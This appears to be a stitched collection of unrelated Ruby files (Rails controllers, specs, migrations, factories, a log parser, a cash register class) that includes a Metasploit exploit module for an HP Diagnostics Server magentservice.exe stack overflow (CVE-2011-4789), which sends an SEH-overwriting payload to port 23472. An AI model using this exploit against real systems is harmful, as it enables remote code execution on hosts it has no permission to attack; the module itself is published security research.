# checkResult90Degrees(fov, 0, lightPasses.center, RESULT_MAP8_RING0_90_NORTH)
# end
# it "should compute visible ring0 90 degrees facing south" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult90Degrees(fov, 4, lightPasses.center, RESULT_MAP8_RING0_90_SOUTH)
# end
# it "should compute visible ring0 90 degrees facing east" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult90Degrees(fov, 2, lightPasses.center, RESULT_MAP8_RING0_90_EAST)
# end
# it "should compute visible ring0 90 degrees facing west" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult90Degrees(fov, 6, lightPasses.center, RESULT_MAP8_RING0_90_WEST)
# end
# end
# end
# end
# end # /* FOV */ |
require('capybara/rspec')
require('./app')

# Feature specs for the stylist pages, driven against the Sinatra app.
Capybara.app = Sinatra::Application
set(:show_exceptions, false)

describe('adding a stylist', {:type => :feature}) do
  it "allows a user to add a new stylist to the list" do
    visit('/')
    fill_in('stylist_name', :with => 'Ruby')
    click_button('Add Stylist')
    expect(page).to have_content('Ruby')
  end
end

describe('deleting a stylist', {:type => :feature}) do
  it "allows a user to delete a stylist on the list" do
    # Two stylists so the page still has content after one is deleted.
    stylist = Stylist.new({:name => "Meaghan", :id => nil})
    stylist.save()
    stylist2 = Stylist.new({:name => "Edu", :id => nil})
    stylist2.save()
    visit('/')
    # NOTE(review): with two stylists listed there may be two
    # 'Delete Stylist' buttons, which would make click_button ambiguous in
    # Capybara — confirm the page renders a single unambiguous button here.
    click_button('Delete Stylist')
    click_link('Return Home')
    expect(page).to have_content(stylist2.name())
  end
end
|
require 'yajl'
module Logical::Naf
module LogParser
class Base
REGEX_OPTIONS = {
'i' => Regexp::IGNORECASE,
'x' => Regexp::EXTENDED,
'm' => Regexp::MULTILINE
}
DATE_REGEX = /((\d){8}_(\d){6})/
UUID_REGEX = /[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}/
LOG_SIZE_CHUNKS = 500
attr_accessor :search_params,
:regex_options,
:grep,
:search_from_time,
:search_to_time,
:jsons,
:logs_size,
:log_type,
:newest_log,
:record_id,
:read_from_s3,
:s3_log_reader,
:last_file_checked,
:newest_file_checked
def initialize(params)
@search_params = params['search_params'].nil? ? '' : params['search_params']
@regex_options = get_option_value(params['regex_options'])
@grep = params['grep']
@search_from_time = params['from_time']
@search_to_time = params['to_time']
@jsons = []
@logs_size = 0
@log_type = params['log_type']
@newest_log = params['newest_log']
@record_id = params['record_id']
@read_from_s3 = params['read_from_s3']
@last_file_checked = params['last_file_checked']
@newest_file_checked = params['newest_file_checked']
end
def retrieve_logs
parse_files
check_repeated_logs
output = ''
jsons.reverse_each do |elem|
output.insert(0, insert_log_line(elem))
end
return {
logs: output.html_safe,
read_from_s3: read_from_s3,
last_file_checked: last_file_checked,
newest_file_checked: newest_file_checked,
newest_log: newest_log
}
end
def check_repeated_logs
if log_type == 'new' && newest_log.present?
@jsons.each_with_index do |elem, index|
if parse_log(elem) == parse_newest_log
@jsons = @jsons[(index + 1)..-1]
return
end
end
end
end
def parse_log(log)
if log['message'].scan(/\t/).present?
message = log['message'].clone
message.slice!('<top (required)>')
"#{log['output_time']} #{message}"
else
"#{log['output_time']} #{log['message']}"
end
end
def parse_files
files = filter_files
files.each do |file|
# Use Yajl JSON library to parse the log files, as they contain multiple JSON blocks
parser = Yajl::Parser.new
json = get_json_from_log_file(file)
parser.parse(json) do |log|
if self.class.to_s == 'Logical::Naf::LogParser::Runner'
log['id'] = get_invocation_id(file.scan(UUID_REGEX).first)
end
log['message'] = CGI::escapeHTML(log['message'])
filter_log_messages(log)
end
sort_jsons
if logs_size >= LOG_SIZE_CHUNKS
update_last_file_checked(file.scan(/\d+_\d{8}_\d{6}.*/).first)
break
end
end
if logs_size < LOG_SIZE_CHUNKS && files.present?
update_last_file_checked(files.last.scan(/\d+_\d{8}_\d{6}.*/).first)
end
end
def update_last_file_checked(file)
if file.present? && last_file_checked.present? && last_file_checked != 'null'
if Time.parse(file.scan(/\d{8}_\d{6}/).first) < Time.parse(last_file_checked.scan(/\d{8}_\d{6}/).first)
@last_file_checked = file
end
elsif file.present?
@last_file_checked = file
end
end
def get_json_from_log_file(file)
if read_from_s3 == 'true' && s3_log_reader.present?
s3_log_reader.retrieve_file(file)
else
File.new(file, 'r')
end
end
def filter_files
files = get_files
original_size = files.size
files.each_with_index do |file, index|
filename = file.scan(/\d+_\d{8}_\d{6}.*/).first
if log_type == 'old'
if filename == last_file_checked
if files.size == 1
files = []
else
files = files[(index + 1)..-1]
end
end
if files.size == 0 && read_from_s3 != 'true'
get_s3_files do
@read_from_s3 = 'true'
@s3_log_reader = ::Logical::Naf::LogReader.new
return retrieve_log_files_from_s3
end
end
elsif log_type == 'new'
if filename == newest_file_checked
if files.size == 1
files = []
else
files = files[0..(index - 1)]
end
end
end
break if original_size != files.size
end
if files.present?
if newest_file_checked.blank? || newest_file_checked == 'null'
@newest_file_checked = files[0].scan(/\d+_\d{8}_\d{6}.*/).first
else
if Time.parse(newest_file_checked.scan(DATE_REGEX)[0][0]) < Time.parse(files[0].scan(DATE_REGEX)[0][0])
@newest_file_checked = files[0].scan(/\d+_\d{8}_\d{6}.*/).first
end
end
end
return files
end
# Decorates one parsed log entry and collects it into @jsons when it falls
# inside the requested time window (and matches the query in grep mode).
#
# NOTE(review): `gsub!` replaces *all* occurrences on the first scan hit, so
# a message containing the same match twice has <span> tags re-wrapped on
# later iterations — confirm whether nested highlighting is intended.
def filter_log_messages(log)
  # Check that the message matches the search query. Highlight the matching results
  if search_params.present?
    log['message'].scan(Regexp.new(search_params, regex_options)).each do |match|
      log['message'].gsub!(match, "<span style='background-color:yellow;'>#{match}</span>")
    end
  end
  # Check that the log happened within the time range specified
  if log_within_time_range(log['output_time'])
    # If grep is selected, only show log messages that match the
    # search query. Otherwise, show all log messages.
    if grep == 'false' || log['message'] =~ Regexp.new(search_params, regex_options)
      @jsons << log
      @logs_size += 1
    end
  end
end
# True when log_time falls inside the user-selected window. An absent bound
# is treated as open-ended; no bounds (or no timestamp) always passes.
def log_within_time_range(log_time)
  from_present = search_from_time.join('').present?
  to_present = search_to_time.join('').present?
  return true if log_time.blank? || (!from_present && !to_present)

  stamp = Time.parse(log_time)
  if from_present && to_present
    stamp <= Time.parse(build_time_string(search_to_time)) &&
      stamp >= Time.parse(build_time_string(search_from_time))
  elsif from_present
    stamp >= Time.parse(build_time_string(search_from_time))
  else
    stamp <= Time.parse(build_time_string(search_to_time))
  end
end
# Builds a Time.parse-able string "YYYY-MM-DD H:MM:00 -0500" from the
# [year, month, day, hour, minute] array produced by the search form.
#
# Month, day and minute are zero-padded with String#rjust. This also fixes
# the original bug where an already-padded value such as "09" ("09".to_i is
# 9 < 10) was prefixed with another '0', producing "009". The hour is left
# unpadded, as before (Time.parse accepts "9:05").
def build_time_string(search_time)
  year, month, day, hour, minute = search_time
  "#{year}-#{month.rjust(2, '0')}-#{day.rjust(2, '0')} " \
    "#{hour}:#{minute.rjust(2, '0')}:00 -0500"
end
# Folds the per-character regex flag string (e.g. "im") into a single
# bitmask using the REGEX_OPTIONS lookup table; blank input yields 0.
def get_option_value(options)
  return 0 if options.blank?
  options.each_char.reduce(0) { |mask, flag| mask | REGEX_OPTIONS[flag] }
end
# Runs the given S3 operation, returning its result. On any failure
# (typically access denied) a synthetic log entry is pushed onto @jsons and
# an empty file list is returned instead of raising.
def get_s3_files
  yield
rescue
  @jsons << {
    'line_number' => 0,
    'output_time' => Time.zone.now.strftime("%Y-%m-%d %H:%M:%S.%L"),
    'message' => 'AWS S3 Access Denied. Please check your permissions.'
  }
  []
end
end
end
end
|
class ReportsController < ApplicationController
  # Landing page for reports: send the user straight to the transactions view.
  def index
    redirect_to action: 'transactions'
  end

  # Lists the current user's transactions, optionally narrowed by date range
  # and category through query params.
  def transactions
    scope = Transaction.where(category_id: current_user.categories.map(&:id))
    filters = {
      'date >= ?' => params[:from_date],
      'date <= ?' => params[:to_date],
      'category_id = ?' => params[:category_id]
    }
    filters.each do |clause, value|
      scope = scope.where(clause, value) if value.present?
    end
    @transactions = scope.all
  end
end
|
require 'date'
module AndroidDeployment
  # Minimal append-only log sink: each line is timestamped and flushed
  # immediately so entries survive a crash.
  class LogFile
    def initialize(file_name)
      @file = File.new("log/#{file_name}.log", 'a+')
    end

    # Writes "[<timestamp>]<message>" and flushes the handle.
    def puts(message)
      line = "[#{DateTime.now}]" + message
      @file.puts(line)
      @file.flush
    end

    def close
      @file.close
    end
  end
end
|
class AddDetailsToUsers < ActiveRecord::Migration
  # Adds member, contact and banking columns to users. Every column is
  # NOT NULL with an empty-string (or zero/"active") default so existing
  # rows remain valid.
  def change
    # name => limit (nil means unlimited); order matches the original.
    string_columns = {
      member_id: 16, first_name: nil, family_name: nil, gender: 8,
      location: nil, street: nil, zipcode: 8, country: 3, phone: 16,
      iban: 34, bic: 11, bank: 32, mandate_reference: 32
    }
    string_columns.each do |name, limit|
      options = { null: false, default: "" }
      options[:limit] = limit if limit
      add_column :users, name, :string, options
    end
    add_column :users, :status, :string, null: false, default: "active", limit: 8
    add_column :users, :comment, :string, null: false, default: ""
    add_column :users, :fee, :decimal, null: false, default: 0.0
  end
end
|
module SkuConfigs
  # Catalogue of purchasable SKU definitions. Each reader returns the option
  # hash used to construct that item; @window comes from the including
  # object (nil when unset).

  def nitrogen
    sku(:nitrogen, "nitrogen.png",
        x: 220, y: 280, quantity: 3, height: 66, width: 60,
        description: "Gives you bonus boost for certain berries.", type: :fertilizer)
  end

  def potassium
    sku(:potassium, "potassium.png",
        x: 260, y: 280, quantity: 3, height: 76, width: 60,
        description: "Gives you pot boost for certain berries.", type: :fertilizer)
  end

  def phosphorus
    sku(:phosphorus, "phosphorus.png",
        x: 340, y: 280, quantity: 3, height: 76, width: 60,
        description: "Gives you pho boost for certain berries.", type: :fertilizer)
  end

  def hoe
    sku(:hoe, "hoe.png",
        x: 375, y: 380, quantity: 1, height: 65, width: 100,
        description: "Hoe that permanently increases berry production by 1", type: :hoe)
  end

  def helpers
    sku(:helpers, "helper.png",
        x: 410, y: 200, quantity: 3, height: 177, width: 150,
        description: "Helpers allow you to take more turns per month", type: :helper)
  end

  def tractor
    sku(:tractor, "tractor.png",
        x: 540, y: 270, quantity: 1, height: 237, width: 350, z: 0,
        description: "The tractor lets you get more work done in less time", type: :tractor)
  end

  private

  # Fields shared by every SKU definition.
  def sku(name, image_link, extra)
    { name: name, image_link: image_link, window: @window }.merge(extra)
  end
end
|
# CRUD for projects. All actions require a signed-in user; edit and destroy
# are restricted to the project's owner.
class ProjectsController < ApplicationController
  before_action :redirect_if_not_signed_in
  before_action :set_user
  before_action :set_project, except: [:index, :new, :create]

  # Lists projects matching the optional search query.
  def index
    @projects = Project.search(params[:query])
  end

  def new
    @project = Project.new
  end

  # Builds the project for the user taken from the route (see set_user).
  def create
    @project = @user.projects.build(project_params)
    if @project.save
      redirect_to projects_path
    else
      flash[:notify] = @project.errors.full_messages
      render :new
    end
  end

  def show
  end

  # Owners only; everyone else is bounced back to the index.
  def edit
    redirect_to projects_path unless current_user == @project.user
  end

  # NOTE(review): unlike edit/destroy there is no ownership check here —
  # confirm whether non-owners should be able to update a project.
  def update
    if @project.update(project_params)
      redirect_to project_path(@project)
    else
      flash[:notify] = @project.errors.full_messages
      render :edit
    end
  end

  def destroy
    if current_user == @project.user
      @project.destroy
    else
      flash[:alert] = "You are not authorized to do that"
    end
    redirect_to projects_path
  end

  private

  # find_by_id returns nil rather than raising when the record is missing.
  def set_user
    @user = User.find_by_id(params[:user_id])
  end

  def set_project
    @project = Project.find_by_id(params[:id])
  end

  def project_params
    params.require(:project).permit(:title, :genre, :info, :contact, :user_id)
  end
end
|
class Role < ActiveRecord::Base
  # Canonical role display names, keyed by symbol.
  ROLES = {
    :admin => 'Admin',
    :editor => 'Editor',
    :registered => 'Registered'
  }

  has_and_belongs_to_many :users

  validates_uniqueness_of :name
  validates_presence_of :name

  # Looks up (creating on first use) the Role record for a known role key,
  # e.g. Role[:admin]. Raises ArgumentError for keys outside ROLES.
  def self.[](value)
    title = ROLES[value]
    raise ArgumentError, "Role not available: '#{value}'" unless title
    Role.find_or_create_by_name(title)
  end
end
|
FactoryGirl.define do
  # Stage factory: the sequence yields a unique URL per build.
  factory :stage do
    sequence(:url) { |n| "test#{n}-example.com" }
  end
end
|
# Fetches the popular-news feed from the Digg API and wraps each entry in a
# lightweight value object.
class Digg
  def initialize
    @resource = (Service.new("http://digg.com/api/news/popular.json")).resource
  end

  # Returns an array of FilterNews, one per item in the feed.
  def get_news
    news = []
    @resource['data']['feed'].each do |item|
      news << FilterNews.new(item)
    end
    news
  end

  private

  # Normalized view over one raw feed item.
  # NOTE(review): `private` does not actually hide a nested class constant;
  # Digg::FilterNews remains reachable (private_constant would be needed).
  class FilterNews
    attr_reader :title, :author, :date, :url, :source

    def initialize (news_hash)
      @title = news_hash['content']['title']
      @author = news_hash['content']['author']
      # 16200 s = 4.5 h added to the feed's epoch timestamp — presumably a
      # timezone adjustment; TODO confirm the intent of this constant.
      @date = (news_hash['date'] + 16200)
      @url = news_hash['content']['url']
      @source = "Digg"
    end
  end
end
|
# Notification mail for document markers. Both mails thread into an existing
# conversation via Message-ID / In-Reply-To headers derived from the marker
# and the document<->user relation.
class MarkerMailer < ActionMailer::Base
  # Sent when a marker is done; replies to the marker-creation message.
  def done_email(marker, user)
    @marker = marker
    @user = user
    # The per-user access code lives on the document<->user relation.
    rel = DocumentUserRelation.find_by_document_id_and_user_id(marker.document.id, user.id)
    @url = code_url(rel.code)
    headers 'In-Reply-To' => marker.message_id('create', @user)
    mail to: @user.email, subject: '@glance marker notification'
  end

  # Sent when a marker is first created; replies to the share message.
  def marker_creation_email(marker, user)
    @marker = marker
    @user = user
    rel = DocumentUserRelation.find_by_document_id_and_user_id(marker.document.id, user.id)
    @url = code_url(rel.code)
    headers 'Message-ID' => marker.message_id('create', @user),
            'In-Reply-To' => rel.message_id('share')
    mail to: @user.email, subject: 'Congratulations, you have new pins @Glance'
  end
end
|
# frozen_string_literal: true
require 'test_helper'
# Minitest specs for Vedeu::Logging::Log: the :_log_ binding, indentation
# counters, and the colourised log/stdout/stderr output helpers.
module Vedeu
  describe 'Bindings' do
    it { Vedeu.bound?(:_log_).must_equal(true) }
  end

  module Logging
    describe Log do
      let(:described) { Vedeu::Logging::Log }
      let(:_message) { 'Some message...' }
      let(:type) { :info }

      describe '.count' do
        it { described.must_respond_to(:count) }
      end

      describe '.count=' do
        it { described.must_respond_to(:count=) }
      end

      # indent increments the indentation counter around a block.
      describe '.indent' do
        context 'when the block is given' do
          subject { described.indent { :block_given } }
          it { subject.must_equal(:block_given) }
        end
        context 'when the block is not given' do
          subject { described.indent }
          it { subject.must_equal(nil) }
        end
        context 'when the indentation count > 0' do
          before { described.count = 2 }
          after { described.count = nil }
          subject { described.indent { :block_given } }
          it { subject; described.count.must_equal(2) }
        end
        context 'when the indentation count is 0' do
          before { described.count = 0 }
          after { described.count = nil }
          subject { described.indent { :block_given } }
          it { subject; described.count.must_equal(0) }
        end
        context 'when the indentation count < 0' do
          before { described.count = -2 }
          after { described.count = nil }
          subject { described.indent { :block_given } }
          it { subject; described.count.must_equal(0) }
        end
      end

      describe '.log' do
        before { Vedeu.config.stubs(:log?).returns(enabled) }
        subject { described.log(message: _message, type: type) }
        context 'when the log is enabled' do
          let(:enabled) { true }
          # Expected value includes the ANSI colour codes for an :info entry.
          let(:expected) {
            "\e[97m[info] \e[39m\e[37mSome message...\e[39m"
          }
          it { subject.must_equal(expected) }
        end
        context 'when the log is disabled' do
          let(:enabled) { false }
          it { subject.must_equal(nil) }
        end
      end

      describe '.log_stdout' do
        let(:type) { :create }
        let(:_message) { 'Logging to stdout...' }
        subject { described.log_stdout(type: type, message: _message) }
        it do
          capture_io { subject }.must_equal(
            ["\e[96m[create] \e[39m\e[36mLogging to stdout...\e[39m\n", ""]
          )
        end
      end

      describe '.log_stderr' do
        let(:type) { :debug }
        let(:_message) { 'Logging to stderr...' }
        subject { described.log_stderr(type: type, message: _message) }
        it do
          capture_io { subject }.must_equal(
            ["", "\e[97m[debug] \e[39m\e[37mLogging to stderr...\e[39m\n"]
          )
        end
      end

      describe '.log_timestamp' do
        it { described.must_respond_to(:log_timestamp) }
      end

      # outdent decrements the indentation counter (never below 0).
      describe '.outdent' do
        context 'when the block is given' do
          subject { described.outdent { :block_given } }
          it { subject.must_equal(:block_given) }
        end
        context 'when the block is not given' do
          subject { described.outdent }
          it { subject.must_equal(nil) }
        end
        context 'when the indentation count > 0' do
          before { described.count = 2 }
          after { described.count = nil }
          subject { described.outdent { :block_given } }
          it { subject; described.count.must_equal(1) }
        end
        context 'when the indentation count is 0' do
          before { described.count = 0 }
          after { described.count = nil }
          subject { described.outdent { :block_given } }
          it { subject; described.count.must_equal(0) }
        end
        context 'when the indentation count < 0' do
          before { described.count = -2 }
          after { described.count = nil }
          subject { described.outdent { :block_given } }
          it { subject; described.count.must_equal(0) }
        end
      end

      describe '.timestamp' do
        subject { described.timestamp }
        # @todo Add more tests.
      end
    end # Log
  end # Logging
end # Vedeu
|
FactoryBot.define do
  # Default build: a valid 30-minute step.
  factory :step do
    operation { "MyString" }
    expected_minutes { 30.0 }
    comment { "MyString" }

    # Missing operation, for validation-failure tests.
    trait :invalid do
      operation { nil }
    end

    # Alternate operation name, for update tests.
    trait :new_operation do
      operation { "NewOperation" }
    end
  end
end
|
class AddOrdersColumns < ActiveRecord::Migration[6.0]
  # Links orders to their video, user and purchase, and adds a confirmation
  # flag that starts out false.
  def change
    add_reference :orders, :video, foreign_key: true
    add_reference :orders, :user, foreign_key: true
    add_reference :orders, :purchase, foreign_key: true
    add_column :orders, :confirmed, :boolean, default: false
  end
end
|
module GoogleApps
  # Represents a domain user.
  class User < Entry
    # Provisioning API endpoints for listing, fetching, creating and
    # updating users on the connected domain.
    get_all { "#{ENDPOINT}/#{GoogleApps.connection.domain}/user/2.0" }
    get_one { |id| "#{ENDPOINT}/#{GoogleApps.connection.domain}/user/2.0/#{id}" }
    post_new { "#{ENDPOINT}/#{GoogleApps.connection.domain}/user/2.0" }
    put_updated { |u| "#{ENDPOINT}/#{GoogleApps.connection.domain}/user/2.0/#{u.user_name}" }

    # Attribute groups map onto the feed's XML namespaces.
    attributes 'apps:login', :user_name, :admin, :suspended, :agreed_to_terms,
               :password, :hash_function_name, :change_password_at_next_login, :ip_whitelisted
    attributes 'apps:name', :given_name, :family_name
    attributes 'apps:quota', :limit

    identity :user_name

    # Set password by sending hashed value.
    # Stores a SHA-1 hex digest and records the hash function so the API
    # knows the value is pre-hashed.
    def new_password=(value)
      @password = Digest::SHA1.hexdigest(value)
      @hash_function_name = 'SHA-1'
    end
  end

  # Represents an email nickname.
  class Nickname < Entry
    get_all { "#{ENDPOINT}/#{GoogleApps.connection.domain}/nickname/2.0" }
    post_new { "#{ENDPOINT}/#{GoogleApps.connection.domain}/nickname/2.0" }
    delete_one { |n| "#{ENDPOINT}/#{GoogleApps.connection.domain}/nickname/2.0/#{n.name}" }

    attributes 'apps:nickname', :name
    attributes 'apps:login', :user_name
  end
end
|
class CashRegister
  # Simple till: tracks a running total, the items rung up, and an optional
  # percentage discount supplied at construction time.
  attr_accessor :total, :discount, :price, :items

  # discount is a whole-number percentage (e.g. 20 for 20% off).
  def initialize(discount = 0)
    @total = 0
    @discount = discount
    @items = []
  end

  # Rings up `amount` copies of `item` at `price` each, remembering the
  # price and quantity so the transaction can be voided later.
  def add_item(item, price, amount = 1)
    @price = price
    @item_num = amount
    @total += price * amount
    # Replaces the original `for i in 1..amount` with dead `i = 0` /
    # `i += 1` bookkeeping: the counter was never used and mutating the
    # loop variable inside `for` over a Range has no effect on iteration.
    amount.times { @items << item }
  end

  # Subtracts the discount from the total and reports the new total.
  # NOTE(review): the savings are computed from the *last* item's unit
  # price (not the whole total) using integer division — confirm that this
  # is the intended behavior; it is preserved here as-is.
  def apply_discount
    return "There is no discount to apply." if @discount == 0
    @savings = (price * discount) / 100
    @total -= @savings
    "After the discount, the total comes to $#{total}."
  end

  # Reverses the last add_item call (all `amount` copies).
  def void_last_transaction
    @total -= @price * @item_num
  end
end
|
require 'msf/core'
# Exploit for the HP Diagnostics Server magentservice.exe stack buffer
# overflow (CVE-2011-4789): an oversized packet overwrites an SEH record.
class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'HP Diagnostics Server magentservice.exe overflow',
      'Description' => %q{
This module exploits a stack buffer overflow in HP Diagnostics Server
magentservice.exe service. By sending a specially crafted packet, an attacker
may be able to execute arbitrary code. Originally found and posted by
AbdulAziz Harir via ZDI.
      },
      'Author' =>
        [
          'AbdulAziz Hariri', # Original discovery
          'hal', # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['OSVDB', '72815'],
          ['CVE', '2011-4789'],
          ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-016/']
        ],
      'Privileged' => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'SSL' => true,
          'SSLVersion' => 'SSL3'
        },
      'Payload' =>
        {
          'Space' => 1000,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500
        },
      'Platform' => 'win',
      'DefaultTarget' => 0,
      'Targets' =>
        [
          [
            'Diagnostics Server 9.10',
            {
              # pop esi # pop ebx # ret 10
              # magentservice.exe
              'Ret' => 0x780c8f1f
            }
          ]
        ],
      'DisclosureDate' => 'Jan 12 2012'))
    register_options([Opt::RPORT(23472)], self.class)
  end

  # Header + 1092 bytes of filler up to the SEH record, then the SEH chain
  # and payload generated by the mixin.
  def exploit
    req = "\x00\x00\x00\x00"
    req << rand_text_alpha_upper(1092)
    req << generate_seh_payload(target.ret)
    connect
    sock.put(req)
    handler
    disconnect
  end
end
require "test_helper"
class UsersControllerTest < ActionDispatch::IntegrationTest
  fixtures :users

  setup do
    @user = users(:one)
  end

  def test_should_get_new
    get new_user_url
    assert_response :success
  end

  # Signing up with nested loan_application_attributes should create both
  # records in a single request.
  # NOTE(review): reuses the fixture's email — assumes no uniqueness
  # validation on email; confirm against the User model.
  def test_should_create_user_and_associated_loan_application
    assert_difference ["User.count", "LoanApplication.count"] do
      post users_url,
        params: {
          user: {
            email: @user.email,
            loan_application_attributes: {
              requested_amount: 400_000,
              property_state: "CA",
              credit_score: 800,
              first_time_home_buyer: false,
            }
          }
        }
    end
    assert_redirected_to edit_user_url(User.last)
  end

  def test_should_get_edit
    get edit_user_url @user
    assert_response :success
  end

  # Updating with nested loan_attributes (including the id) should update
  # the existing loan and redirect to it.
  def test_should_update_user_with_selected_loan
    patch user_url(@user),
      params: {
        user: {
          email: @user.email,
          loan_attributes: {
            id: @user.loan.id,
            name: "Some Good Loan",
            rate: 1.0,
            term: 360,
          }
        }
      }
    assert_redirected_to loan_url(@user.loan)
  end
end
|
class User < ActiveRecord::Base
  include SessionsHelper

  has_secure_password

  # Basic "local@domain.tld" shape; \A/\z anchor the whole string.
  VALID_EMAIL_REGEX = /\A[\w+\-.]+@[a-z\d\-.]+\.[a-z]+\z/i

  validates :email,
            presence: true,
            format: { with: VALID_EMAIL_REGEX },
            uniqueness: { case_sensitive: false }
  # allow_nil fixes updates that do not resupply a password: without it the
  # length check ran against a nil password on every save, making such
  # updates impossible. has_secure_password still requires a password on
  # create, so blank sign-ups remain rejected.
  validates :password,
            length: { minimum: 6 },
            allow_nil: true

  # Store emails in canonical lower-case form for uniqueness lookups.
  before_save do
    self.email.downcase!
  end

  # Issue a remember token, plus a confirmation token unless confirmation
  # is being skipped (e.g. seeded or admin-created accounts).
  before_create do
    self.remember_token = encrypt_token new_token
    self.confirmation_token = new_token unless self.skip_confirmation
  end

  after_create do
    UserMailer.confirmation_email(self).deliver_later
  end

  # When truthy, the confirmation-token flow is bypassed for this record.
  attr_accessor :skip_confirmation

  # A user counts as confirmed once the confirmation token is cleared.
  def confirmed?
    confirmation_token.nil?
  end

  def confirm!
    update_attribute :confirmation_token, nil
  end

  def skip_confirmation!
    @skip_confirmation = true
  end
end
|
# Admin CRUD for PIN groups plus (de)activation of groups and individual
# PIN numbers. PIN searches use searchlogic-style condition hashes.
class PinGroupsController < ApplicationController
  before_filter :login_required
  filter_access_to :all

  # GET /pin_groups
  # GET /pin_groups.xml
  def index
    @pin_groups = PinGroup.paginate :per_page=>20,:page => params[:page], :order => 'id DESC'
    respond_to do |format|
      format.html # index.html.erb
      format.xml { render :xml => @pin_groups }
    end
  end

  # GET /pin_groups/1
  # GET /pin_groups/1.xml
  def show
    @pin_group = PinGroup.find(params[:id])
    # Scope any incoming search to this group.
    if params[:search].nil?
      params[:search] = {:pin_group_id_equals => @pin_group.id}
    else
      # BUG FIX: `merge` returns a new hash and its result was previously
      # discarded, so user-supplied searches were never restricted to this
      # pin group. Assign the merged hash back.
      params[:search] = params[:search].merge(:pin_group_id_equals => @pin_group.id)
    end
    @results = PinNumber.search(params[:search])
    @pin_numbers = @results.paginate :per_page=>30,:page => params[:page], :order => 'id DESC'
  end

  # AJAX search within a group: exact match for full-length queries (>= 14
  # chars), prefix match otherwise, optionally filtered on state.
  def search_ajax
    @pin_group = PinGroup.find(params[:pin_group_id])
    # Offset of the first row on this page (30 rows per page).
    @i = ((params[:page].to_i - 1) * 30) if params[:page].present?
    unless params[:search]
      search = {:pin_group_id_equals => params[:pin_group_id]}
      if params[:query].length >= 14
        search = search.merge(:number_equals => params[:query].strip)
      else
        search = search.merge(:number_begins_with => params[:query].strip)
      end
      if params[:option] == "active"
        search = search.merge(:is_active_equals => true)
      elsif params[:option] == "inactive"
        search = search.merge(:is_active_equals => false)
      elsif params[:option] == "registered"
        search = search.merge(:is_registered_equals => true)
      end
    else
      # Re-running a previously built search (e.g. for pagination).
      @repeat_search = true
      @search = params[:search]
      search = params[:search]
    end
    @results = PinNumber.search(search)
    @pin_numbers = @results.paginate :per_page=>30,:page => params[:page], :order => 'id DESC'
    render :update do |page|
      @query = params[:query]
      @option = params[:option]
      page.replace_html 'pin_list',:partial => 'list_pins'
    end
  end

  # GET /pin_groups/new
  # GET /pin_groups/new.xml
  def new
    @pin_group = PinGroup.new
    @courses = RegistrationCourse.active
    respond_to do |format|
      format.html # new.html.erb
      format.xml { render :xml => @pin_group }
    end
  end

  # GET /pin_groups/1/edit
  def edit
    @courses = RegistrationCourse.active
    @pin_group = PinGroup.find(params[:id])
  end

  # POST /pin_groups
  # POST /pin_groups.xml
  def create
    @pin_group = PinGroup.new(params[:pin_group])
    respond_to do |format|
      if @pin_group.save
        flash[:notice] = t('flash1')
        format.html { redirect_to(@pin_group) }
        format.xml { render :xml => @pin_group, :status => :created, :location => @pin_group }
      else
        @courses = RegistrationCourse.active
        format.html { render :action => "new" }
        format.xml { render :xml => @pin_group.errors, :status => :unprocessable_entity }
      end
    end
  end

  # PUT /pin_groups/1
  # PUT /pin_groups/1.xml
  def update
    @pin_group = PinGroup.find(params[:id])
    @courses = RegistrationCourse.active
    # A group must always be linked to at least one course.
    unless params[:pin_group][:course_ids].present?
      @pin_group.errors.add("course_ids","can't be blank")
      render :edit and return
    end
    respond_to do |format|
      if @pin_group.update_attributes(params[:pin_group])
        # Cascade the group's active flag down to all of its PIN numbers.
        if params[:pin_group][:is_active]=="1"
          @pin_group.pin_numbers.update_all("is_active=true")
        else
          @pin_group.pin_numbers.update_all("is_active=false")
        end
        flash[:notice] = t('flash2')
        format.html { redirect_to(@pin_group) }
        format.xml { head :ok }
      else
        format.html { render :action => "edit" }
        format.xml { render :xml => @pin_group.errors, :status => :unprocessable_entity }
      end
    end
  end

  # DELETE /pin_groups/1 — despite the route, this toggles the group (and
  # all of its PINs) between active and inactive; nothing is destroyed.
  def deactivate_pin_group
    @pin_group = PinGroup.find(params[:id])
    if @pin_group.is_active?
      @pin_group.update_attributes(:is_active => false)
      PinNumber.update_all("is_active= false","pin_group_id = #{@pin_group.id}")
    else
      @pin_group.update_attributes(:is_active => true)
      PinNumber.update_all("is_active= true","pin_group_id = #{@pin_group.id}")
    end
    flash[:notice] = t('flash3')
    redirect_to pin_groups_path
  end

  # Toggles a single PIN and keeps the parent group consistent: the group
  # deactivates when its last active PIN goes, and reactivates when a PIN
  # comes back.
  def deactivate_pin_number
    @pin_number = PinNumber.find(params[:id])
    @pin_group = @pin_number.pin_group
    if @pin_number.is_active?
      @pin_number.update_attributes(:is_active => false)
      if @pin_group.pin_numbers.count(:conditions=>{:is_active=>true})== 0 and @pin_group.is_active
        @pin_group.update_attributes(:is_active => false)
      end
    else
      @pin_number.update_attributes(:is_active => true)
      if @pin_group.pin_numbers.count(:conditions=>{:is_active=>true}) > 0 and @pin_group.is_active == false
        @pin_group.update_attributes(:is_active => true)
      end
    end
    flash[:notice] = t('flash4')
    redirect_to @pin_group
  end
end
|
# frozen_string_literal: true
require 'emis/models/combat_pay'
require 'emis/models/deployment'
require 'emis/models/veteran_status'
module EMIS
  module Models
    # Dental-benefit eligibility indicator tied to a separation date.
    class DentalIndicator
      include Virtus.model

      attribute :separation_date, Date
      attribute :dental_indicator, String
    end

    # Country where an eligibility deployment took place.
    class EligibilityDeploymentLocation
      include Virtus.model

      attribute :segment_identifier, String
      attribute :country_code, String
